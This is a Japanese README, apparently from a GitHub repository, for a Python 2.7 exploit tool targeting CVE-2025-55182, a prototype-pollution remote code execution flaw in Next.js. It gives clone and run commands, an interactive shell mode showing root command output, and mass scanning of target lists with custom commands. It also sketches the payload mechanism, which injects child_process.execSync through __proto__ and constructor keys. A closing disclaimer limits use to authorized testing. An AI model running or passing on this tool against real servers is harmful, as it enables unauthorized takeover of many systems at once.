
CVE-2025-55182 エクスプロイトツール – Next.js のプロトタイプ汚染による RCE につながる Python 2.7 エクスプロイト
CVE-2025-55182 を悪用する Python 2.7 エクスプロイト - Next.js アプリケーションにおける重大なプロトタイプ汚染 / RCE 脆弱性です。
このツールは、単一ターゲットのインタラクティブシェル と、マルチスレッド、カラー出力、自動 HTTPS フォールバックを備えた複数ホストの 一括スキャン の両方をサポートします。
https:// を自動追加id を任意のコマンド (whoami、ls など) に変更可能requests のみ (簡単にインストール可能)requests ライブラリ – 以下のコマンドでインストール:
pip install requests
git clone https://github.com/Jenderal92/cve-2025-55182.git
cd CVE-2025-55182
pip install requests
スクリプトに実行権限を付与 (オプション):
chmod +x CVE-2025-55182.py
python2 CVE-2025-55182.py https://target.com
またはプロトコルなし (HTTPS が自動追加されます):
python2 CVE-2025-55182.py target.com
接続され、脆弱性が確認されると、シェルプロンプトが表示されます:
$ id
uid=0(root) gid=0(root) groups=0(root)
$ whoami
root
$ ls -la
...
組み込みコマンド:
exit / quit – シェルを閉じるclear – 画面をクリアhelp – ヘルプを表示1行に1ターゲットを記述したファイルを用意します (http/https の有無は問いません):
targets.txt
app-site3.htface.tech
https://example.com
http://127.0.0.1:3000
vulnerable-site.org
一括スキャンを実行 (デフォルト: 10スレッド、コマンド id、出力 res.txt):
python2 CVE-2025-55182.py targets.txt
スレッド数、コマンド、出力ファイルをカスタマイズ:
python2 CVE-2025-55182.py targets.txt 20 "whoami" results.txt
20 – スレッド数whoami – 脆弱な各ターゲットで実行するコマンドresults.txt – 出力ファイル (脆弱なエントリのみ保存)一括スキャンの出力例:
[INFO] Loaded 4 URLs
[INFO] Threads: 10, Command: 'id', Output: res.txt
[*] (1/4) Checking: https://site.com
[+] VULNERABLE: https://site.com
Status: 303
Output: uid=0(root) gid=0(root) groups=0(root)
[-] NOT VULNERABLE: https://example.com
...
保存された結果 (res.txt):
domain : https://site.com
cmd : uid=0(root) gid=0(root) groups=0(root)
--------------------------------------------------
このエクスプロイトは、細工された multipart/form-data リクエストを Next.js のエンドポイント (パスが空の場合は /login が追加されます) に送信します。
プロトタイプ汚染 (__proto__:then と constructor:constructor) を悪用して、child_process.execSync() を使用してシステムコマンドを実行する悪意のあるプレフィックスを注入します。
サーバーは x-action-redirect ヘッダー (または Location) にコマンド出力を含む 303 リダイレクトで応答します。ツールは /login?a=<output> から結果を抽出します。
このツールは教育目的および許可されたセキュリティテスト専用です。 コンピュータシステムへの不正アクセスは違法です。著者は、本ソフトウェアの誤用または損害について一切の責任を負いません。 このエクスプロイトを使用する前に、ターゲットシステムの所有者から明示的な書面による許可を得る必要があります。
詳細な免責事項は Jenderal92 のカバーに記載されています。こちら で確認できます。